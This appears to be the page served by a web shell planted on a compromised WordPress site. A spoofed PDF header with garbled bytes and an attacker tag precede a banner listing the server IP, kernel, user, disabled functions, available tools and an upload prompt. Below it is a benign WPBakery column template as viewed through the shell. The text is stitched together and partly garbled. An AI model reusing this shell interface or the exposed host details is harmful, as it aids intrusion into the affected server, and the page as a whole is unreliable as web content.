...........................................................................................................................................................................................................................................................................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%PDF-1.5 MRK IS HERE %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
| Server IP : 65.108.66.160 / Your IP : 216.73.217.50 Web Server : Apache System : Linux srv16.asso.com.ar 4.18.0-553.123.1.el8_10.x86_64 #1 SMP Tue May 5 04:00:43 EDT 2026 x86_64 User : alasaweborg ( 1047) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/alasaweborg/public_html/wp-content/themes/greenture/vc_templates/ |
Upload File : |
<?php
if ( ! defined( 'ABSPATH' ) ) {
die( '-1' );
}
/**
* Shortcode attributes
* @var $atts
* @var $el_class
* @var $width
* @var $css
* @var $offset
* @var $content - shortcode content
* Shortcode class
* @var $this WPBakeryShortCode_VC_Column
*/
$el_class = $width = $css = $offset = '';
$output = '';
$atts = vc_map_get_attributes( $this->getShortcode(), $atts );
extract( $atts );
$width = wpb_translateColumnWidthToSpan( $width );
$width = vc_column_offset_class_merge( $offset, $width );
$css_classes = array(
$this->getExtraClass( $el_class ),
'wpb_column',
'vc_main_column',
'vc_column_container',
$width,
);
if (vc_shortcode_custom_css_has_property( $css, array('border', 'background') )) {
$css_classes[]='vc_col-has-fill';
}
$column_inner_class = '';
// Custom Background Style
if( isset( $column_bg ) && $column_bg != '' ) {
$column_inner_class = ' bg-style ' . $column_bg;
}
// Background Overlay Style
if( isset( $column_bg ) && $column_bg == 'overlay-wrapper' ) {
if( isset( $bg_overlay_style ) && $bg_overlay_style != '' ) {
$column_inner_class .= ' bg-overlay ' . $bg_overlay_style;
}
if( isset( $bg_overlay_opacity ) && $bg_overlay_opacity != '' ) {
$column_inner_class .= ' ' . $bg_overlay_opacity;
}
}
if( isset( $typo_style ) && $typo_style != '' ) {
$css_classes[] = ' typo-' . $typo_style;
}
// Animation
if( isset( $css_animation ) && $css_animation != '' ) {
$css_classes[] = $this->getCSSAnimation( $css_animation );
}
$wrapper_attributes = array();
$css_class = preg_replace( '/\s+/', ' ', apply_filters( VC_SHORTCODE_CUSTOM_CSS_FILTER_TAG, implode( ' ', array_filter( $css_classes ) ), $this->settings['base'], $atts ) );
$wrapper_attributes[] = 'class="' . esc_attr( trim( $css_class ) ) . '"';
echo '<div ' . implode( ' ', $wrapper_attributes ) . '>';
echo '<div class="tpath-column-inner-wrapper vc_column-inner' . esc_attr( $column_inner_class ) .' ' . esc_attr( trim( vc_shortcode_custom_css_class( $css ) ) ) . '">';
// Pattern BG
if( isset( $pattern_bg ) && $pattern_bg == 'pattern-yes' ) {
echo '<div class="tpath-column-pattern"></div>';
}
echo '<div class="wpb_wrapper">';
echo wpb_js_remove_wpautop( $content );
echo '</div>';
echo '</div>';
echo '</div>';